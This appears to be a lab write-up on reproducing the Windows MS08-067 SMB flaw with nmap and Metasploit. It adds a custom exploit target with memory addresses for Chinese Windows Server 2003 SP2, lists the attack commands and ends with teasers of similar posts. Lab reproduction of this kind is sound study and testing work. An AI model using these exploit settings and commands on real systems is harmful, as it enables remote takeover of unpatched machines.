tags: Vulnerability recurrence Safety Security breach information security
A remote code execution vulnerability exists in the server service on the Windows system. The vulnerability is caused by the service incorrectly handling specially crafted RPC requests. An attacker who successfully exploited this vulnerability could take complete control of the affected system.
Nmap for vulnerability detection
#nmap target ip --script=smb-vuln-ms08-067.nse
nmap 192.168.234.129 --script=smb-vuln-ms08-067.nse
promptVULNERABLEIndicates that the vulnerability exists

The exploit tool is msf, and the system I reproduced is the Chinese version of Windows Server 2003 SP2. But I found that there is no Chinese version of the exp framework in msf.

Add the exploit code:
#Modify msf exploit code
vim /usr/share/metasploit-framework/modules/exploits/windows/smb/ms08_067_netapi.rb
Add the following content:
[ 'Windows 2003 SP2 Chinese (NX)',
{
'RetDec' => 0x7c99beb8, # dec ESI, ret @NTDLL.DLL (0x4EC3)
'RetPop' => 0x7cb5e84e, # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)
'JmpESP' => 0x7c99a01b, # jmp ESP @NTDLL.DLL(0xFFE4)
'DisableNX' => 0x7c96f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],

#Enter msf
msfconsole
#Find the vulnerability framework and call
search ms08-067
use exploit/windows/smb/ms08_067_netapi
When viewing the system exp framework, you can see what we have addedwindwos 2003 SP2 Chinese
show targets

Set the target ip and other parameters, you can start the attack
set target 1
set rhost 192.168.234.129
show options


Microsoft has released the MS08-067 patch:
http://technet.microsoft.com/zh-cn/security/bulletin/ms08-067
1. Open Easy File Sharing Web server and change the port to 8000 2. First find the local IP address Then open the kali terminal and enter: nmap 10.34.25.83 (local ip) (To use the local ip address, the...
MS08-067 Remote Overflow Vulnerability Brief description of the vulnerability principle The attacker uses the default open SMB service port 445 of the victim host to send a special RPC (Remote ...
ms08-067 introduction The MS08-067 vulnerability will affect all Windows systems except Windows Server 2008 Core, including: Windows 2000/XP/Server 2003/Vista/Server 2008 versions, and even Windows 7 ...
nmap scanning system for vulnerabilities, scanning system information nmap --script = vuln 192.168.64.137 Check for common vulnerabilities nmap -O detection system version Start msfconsole, search for...
Vulnerability introduction: The MS08-067 vulnerability will affect all Windows systems except Windows Server 2008 Core, including: Windows 2000/XP/Server 2003/Vista/Server 2008 versions, and even Wind...
MS08-067 reproduce basic introduction Introduction: MS08-067 is a huge vulnerability that broke out in 2008. It existed in all Microsoft systems at the time and was extremely lethal Attack principle: ...
MS08-067 penetration This vulnerability is more famous and does not require much introduction. Start to penetrate directly. Infiltration preparation windows xp and kali (both are in the same network) ...
Vulnerability introduction: If the user receives a special RPC request on the affected system, the vulnerability may allow remote execution code. At Microsoft Windows 2000, Windows XP, and Windows Ser...
MS08-067 vulnerability lab environment 1.kali linux(ip:192.168.131.131) 2.windows xp (ip:192.168.131.134) Port detection nmap 192.168.131.134 It is found that high-risk ports such as 445 and 3389 are ...
Purpose Using the MS08-067 vulnerability in the Windows platform, the remote command execution operation was successfully performed, and the 3389 remote login was successfully performed. Ports used: 4...